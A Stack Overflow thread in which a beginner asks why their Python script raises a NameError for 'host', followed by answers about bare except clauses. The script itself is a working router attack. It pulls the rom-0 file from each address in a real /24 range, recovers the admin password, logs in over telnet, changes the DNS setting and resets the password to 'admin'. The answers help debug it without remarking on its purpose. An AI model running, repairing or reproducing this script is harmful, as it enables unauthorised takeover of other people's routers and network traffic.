# NameError: name 'host' is not defined

Tags: python

I'm new in python programming. When i try running a simple python script i get error like this in my terminal

```
root@bt:/tmp# python code.py
Traceback (most recent call last):
File "code.py", line 42, in <module>
print host+" -> Offline!"
NameError: name 'host' is not defined
```

I have been search in Google but im difficult to fix my problem because im new in this programming language. Can you help me? 
This is my script like this :

```
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
from netaddr import IPNetwork
import urllib2
import urllib
import re
import getpass
import sys
import telnetlib
import time
import os
import socket
import sys
socket.setdefaulttimeout(4)

register_openers()

try:
    os.remove("rom-0")
except:
    pass
try:
    host=str(sys.argv[1])
    urllib.urlretrieve ("http://"+host+"/rom-0", "rom-0")

    datagen, headers = multipart_encode({"uploadedfile": open("rom-0")})

    request = urllib2.Request("http://localhost/decoded.php", datagen, headers)

    str1 = urllib2.urlopen(request).read()
    m = re.search('rows=10>(.*)', str1)
    if m:
        found = m.group(1)   
    tn = telnetlib.Telnet(host, 23, 3)         
    tn.read_until("Password: ") 
    tn.write(found + "\n") 
    tn.write("set lan dhcpdns 8.8.8.8\n")
    tn.write("sys password admin\n")
    print host+" -> Success" 
    tn.write("exit\n")
except:
    print host+" -> Offline!"
```

How i can fix error like this.?
Thanks

If i put : host=str(sys.argv[1]) before try.except show error like this :

Traceback (most recent call last):
  File "code.py", line 17, in 
    host=str(sys.argv[1])
IndexError: list index out of range

And this is my input :

```
from netaddr import IPNetwork
import os
for ip in IPNetwork ('41.108.48.1/24'):
    os.system("python code.py "+str(ip))
```

Comment: As an aside, long `try` blocks are almost always the wrong thing to do. This would be much easier to debug if you break it up into all the pieces of code that MIGHT fail.

Answer (score 2):

Your `except` clause will catch any error in any line of code in the `try` block. If you don't specify enough arguments on the command line, the line `host = str(sys.argv[1])` will fail, leaving `host` unassigned, which then causes the error you are seeing when you try to `print` it.

You should take most of the code out of your `try` block, really, and/or create multiple `try` blocks that catch errors in much smaller chunks of code. Furthermore, you should specify the *actual exception type* you want to handle with each `except` instead of trying to handle all of them. Bare `except:` catches things you probably don't want caught, such as `KeyboardInterrupt` and `SystemExit`. If you must catch most exceptions, use `except Exception:` instead of just `except:`.

Comment: Does a bare `except` catch `BaseException`s? I can't replicate that behavior in my interpreter.

Comment: Disregard, I've had a long day and am coming down with an acute case of PEBKAC

Answer (score 1):

it seem that your script expects an input parameter

> host=str(sys.argv[1])

in case that parameter is not supplied, as shown in your post, an exception raised and been caught in the except clause **before** the host parameter was defined

try to declare `host` before the try/except block

Answer (score -1):

you are defining `host` in the first line of `try/except`
i believe the error is in that first line.
to debug this take remove the `try/except` to see what the actual error is.

Comment: Although bare `except` clauses are ugly, removing that block will just throw `IndexError: list index out of range` and be no more use to him. We see where `host` is assigned and see that it's not being assigned -- we can debug from the `sys.argv[1]` call.

Comment: exactly, that is the actual error. so why would you down vote my suggestion on how to find out the actual error? and this without even suggesting a better answer... that explains a lot.

Comment: Because we already know, from the code in the question, what the actual problem is. Removing the `try/except` block doesn't illuminate anything -- it's already clear. There's exactly one thing that could cause a `NameError` for `host`. No reason to have him muck about with his code to produce a DIFFERENT error and call that an answer.

Comment: its not clear to the person who asked the question. it might be clear to you and it is to me but that doesn't mean he understands how to debug. still not cool to down vote bro.

Comment: StackOverflow does not attempt to teach the user how to program. Your answer doesn't solve the question, so I downvoted it. In a question with exact scope (not a broader question that wouldn't fit on SO anyway, e.g. "How do I find the 1000th prime"), you're providing the very first step to debugging and calling that an answer. It's not. That's a comment at best.